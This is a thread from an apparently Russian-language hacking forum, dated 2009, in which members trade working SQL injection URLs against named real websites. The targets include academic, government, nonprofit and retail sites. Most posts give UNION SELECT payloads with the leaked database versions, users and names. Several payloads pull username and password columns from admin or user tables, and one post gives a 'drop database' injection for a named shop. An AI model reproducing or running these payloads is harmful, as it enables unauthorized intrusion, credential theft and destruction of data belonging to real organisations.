SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Rubaka

    Rubaka Elder - Старейшина

    Joined:
    2 Sep 2007
    Messages:
    263
    Likes Received:
    150
    Reputations:
    28
    http://www.travellingtight.com/journal.php?id=3/**/UNION/**/SELECT/**/1,2,3,4,5,6,7/**/LIMIT/**/1,1

    Database Version: 5.0.27-Debian_0.dotdeb.1
    Database name: travellingtight_main
    User name: travellingtight_us3r@localhost
     
    1 person likes this.
  2. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    http://www.sciencesmath-paris.math.jussieu.fr/index.php?page=-16'+union+select+1,2,concat_ws(0x3a,ID_USER,LOGIN_USER,PASS_USER,NOM_USER,PRENOM_USER,GENRE_USER,MAIL_USER,LVL_USER)+from+FOND_USER+limit+3,1+/*+&lien=14&lang=fr

    http://www.sgieurope.com/index.php?RubID=24+union+select+1,2,concat_ws(0x3a3a,UserLogin,UserPassword),4,5,6,7,8,9,10+from+user+--+

    http://www.fhp.fr/index.php?ID=&LangueID=1&ThemeID=-1+union+select+1,2,3,4,5,6,7,8+from+user+--+&RubID=1

    http://surlinjobs.com/showjob.php?jobcode=-2604+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,concat_ws(0x3a3a,id,username,password),22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+from+admin+limit+6,1+--+
     
    4 people like this.
  3. Dyxxx

    Dyxxx Elder - Старейшина

    Joined:
    16 Feb 2009
    Messages:
    107
    Likes Received:
    155
    Reputations:
    24
    Gis-t.org pr5
    The American Association of State Highway and Transportation Officials sponsors the annual GIS for Transportation Symposium.
    Code:
    [COLOR=SlateGray]http://www.gis-t.org/poster.php?year=2008+and+substring(version(),1,1)=5+--+[/COLOR]
    mysql version: 5.0.81-community
    mysql user: gistorg_db@localhost
     
    2 people like this.
  4. [x60]unu

    [x60]unu Banned

    Joined:
    7 May 2009
    Messages:
    98
    Likes Received:
    498
    Reputations:
    163
    fitness.yantra.su -
    http://fitness.yantra.su/next.php?id=1/**/anD/**/1=8%20/**/unION/**/seLEcT/**/1,version(),3/*
    version - 4.1.22-log
    user - [email protected]
    database - yantra_main
     
    7 people like this.
  5. Zedi

    Zedi Elder - Старейшина

    Joined:
    6 Jun 2007
    Messages:
    316
    Likes Received:
    120
    Reputations:
    13
    http://www.theglasgowcollective.com/artists/detail/index.php?id=-1+UNION+SELECT+database(),version()
    version - 5.0.45-log
    user - [email protected]
    database - theglasgow1
     
    3 people like this.
  6. Slavuti4

    Slavuti4 Elder - Старейшина

    Joined:
    22 Jan 2009
    Messages:
    555
    Likes Received:
    482
    Reputations:
    124
    www.psychodelart.com
    ТИЦ:20
    PHP:
    http://www.psychodelart.com/projects.php?ptype=-4+union+select+1,2,3,4,5,concat_ws(0x3a,version(),user(),database()),7,8,9/*
    Version():4.0.27-max-log
    Database():geokon10_db01
    User():[email protected]

    www.geokongroup.com
    ТИЦ:20
    PR:4
    PHP:
    http://www.geokongroup.com/shownews.php?news=-42+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7
    Version():4.0.27-max-log
    Database():geokon10
    User():[email protected]
     
    2 people like this.
  7. Zedi

    Zedi Elder - Старейшина

    Joined:
    6 Jun 2007
    Messages:
    316
    Likes Received:
    120
    Reputations:
    13
    http://www.sacredpassage.com/schedule/index.php?id=-1+UNION+SELECT+1,user%28%29,3,4
    version - 4.1.22-standard-log
    user - sacredpa_sacred1@localhost
    database - sacredpa_sacredpa
     
    1 person likes this.
  8. DeepBlue7

    DeepBlue7 Elder - Старейшина

    Joined:
    2 Jan 2009
    Messages:
    359
    Likes Received:
    50
    Reputations:
    12
    lol

    Code:
    http://www.sagiv.co.il/main.asp?cat=site&sel_nav1=1+or+1=@@version--


    Microsoft SQL Server 2005 - 9.00.3042.00 (Intel X86) Feb 9 2007 22:47:07 Copyright (c) 1988-2005 Microsoft Corporation Express Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
     
    2 people like this.
  9. Rubaka

    Rubaka Elder - Старейшина

    Joined:
    2 Sep 2007
    Messages:
    263
    Likes Received:
    150
    Reputations:
    28
    http://livefrogsupyourarse.com/index.php?cat=php&item=1+UNION+SELECT+1,2,version(),4,5,6,7,8+LIMIT+1,1

    Database Version: 5.0.81-community
    Database name: livefrog_frosk
    User name: livefrog_loon@localhost

    http://www.obs.org/page.php?ITEM=26+UNION+SELECT+1,2,3,4,5,6,7,8,9+FROM+users+LIMIT+1,1

    Database Version: 4.0.27-max-log
    Database name: db136428592
    User name: [email protected]


    http://www.greenmagazine.com.au/news.php?aid=257+UNION+SELECT+1+FROM+LIMIT+1,1

    Database Version: 4.1.22-standard-log
    Database name: gre32382_greenmagazine
    User name: gre32382@localhost
     
    #10789 Rubaka, 6 Oct 2009
    Last edited: 6 Oct 2009
    2 people like this.
  10. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    User: [email protected]
    Database: db166299381
    Version: 4.0.27-max-log
     
    4 people like this.
  11. toross

    toross Banned

    Joined:
    11 Dec 2008
    Messages:
    0
    Likes Received:
    18
    Reputations:
    1
    http://www.emediaworld.com/press_release/release_detail.php?id=-87007+union+select+1,2,3,4,5,6,7,8,9,10,version(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- пятрека

    4.0.27-standard

    5.0.51a-3-log
     
    1 person likes this.
  12. -JC-

    -JC- Member

    Joined:
    10 Mar 2009
    Messages:
    54
    Likes Received:
    18
    Reputations:
    11
    Code:
    http://www.lymediseaseassociation.org/referral/Petitions/Petition.php?id=-1'+union+select+1,2,version()+--+
    
    5 ветка
     
    2 people like this.
  13. edge911

    edge911 Active Member

    Joined:
    21 Feb 2009
    Messages:
    105
    Likes Received:
    142
    Reputations:
    15
    PR6
     
    3 people like this.
  14. Swift

    Swift Banned

    Joined:
    27 Oct 2008
    Messages:
    78
    Likes Received:
    156
    Reputations:
    8
    http://score.dnr.sc.gov/deep.php?subject=2&topic=1+union+select+1,concat(0x2a,version(),user(),database()),3,4,5+limit+1,1/*

    4.1.20 score@localhostscore
     
    2 people like this.
  15. Kamik

    Kamik Member

    Joined:
    2 Dec 2008
    Messages:
    122
    Likes Received:
    85
    Reputations:
    8
    Какойто онлаин магазин)))

    http://www.avtax.ru/?info=3+union+select+1,concat_ws(user(),0x3a,version(),0x3a,database()),3,4,5/*&subinfo=9

    А вот и прикол! вывод результата

    # Кто мы?

    # :[email protected]@localhost.localdomain:[email protected]_avtax2


    Далее

    http://www.avtax.ru/?info=3+union+select+1,table_name,3,4,5+from+information_schema.tables/*&subinfo=9

    PHP:
    # Кто мы?

    # CHARACTER_SETS

    # COLLATIONS

    # COLLATION_CHARACTER_SET_APPLICABILITY

    # COLUMNS

    # COLUMN_PRIVILEGES

    # KEY_COLUMN_USAGE

    # ROUTINES

    # SCHEMATA

    # SCHEMA_PRIVILEGES

    # STATISTICS

    # TABLES

    # TABLE_CONSTRAINTS

    # TABLE_PRIVILEGES

    # TRIGGERS

    # USER_PRIVILEGES

    # VIEWS

    # tabCategories

    # tabInfo

    # tabMainInfo

    # tabModels

    # tabSex

    # tabSubTovars

    # tabTovars

    # tabTovars_copy

    Далее думаю ясно всем будет))))

    Также можно выполнить ;)

    http://www.avtax.ru/?info=3+drop+database+db_avtax2/*&subinfo=9

    Но я не стал этого делать... :D
     
    #10795 Kamik, 7 Oct 2009
    Last edited: 7 Oct 2009
    4 people like this.
  16. Rubaka

    Rubaka Elder - Старейшина

    Joined:
    2 Sep 2007
    Messages:
    263
    Likes Received:
    150
    Reputations:
    28
    http://www.soltis-toiles.com/cat.php?p=11+UNION+SELECT+1,version(),3,4,5,6,7,8,9+LIMIT+1,1

    Database name: soltis-stores
    User name: soltis-stores@localhost
    Database name: soltis-stores
     
    1 person likes this.
  17. 0nep@t0p

    0nep@t0p Elder - Старейшина

    Joined:
    25 May 2007
    Messages:
    134
    Likes Received:
    216
    Reputations:
    17
    http://www.firestone-duncan.com/print.php?topic=Services&cid=-1+union+select+1,2,'xekme',4,5,6+from+mysql.user--+
     
    4 people like this.
  18. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    MsSQL
    Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 1)
     
  19. -JC-

    -JC- Member

    Joined:
    10 Mar 2009
    Messages:
    54
    Likes Received:
    18
    Reputations:
    11
    Code:
    http://www.techiwarehouse.com/cms/articles.php?cat=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16+--+
     
  20. gooxakep

    gooxakep New Member

    Joined:
    25 Jul 2009
    Messages:
    1
    Likes Received:
    1
    Reputations:
    0
    http://www.topi-top.com.ua/show_cat2.php?grid=-1+union+select+concat_ws(0x3a,username,password)+from+admin--


    http://www.modeli.com.ua/show_cat2.php?grid=-1+union+select+concat_ws(0x3a,username,password)+from+admin--
     
    #10800 gooxakep, 8 Oct 2009
    Last edited by a moderator: 8 Oct 2009
    1 person likes this.
Thread Status:
Not open for further replies.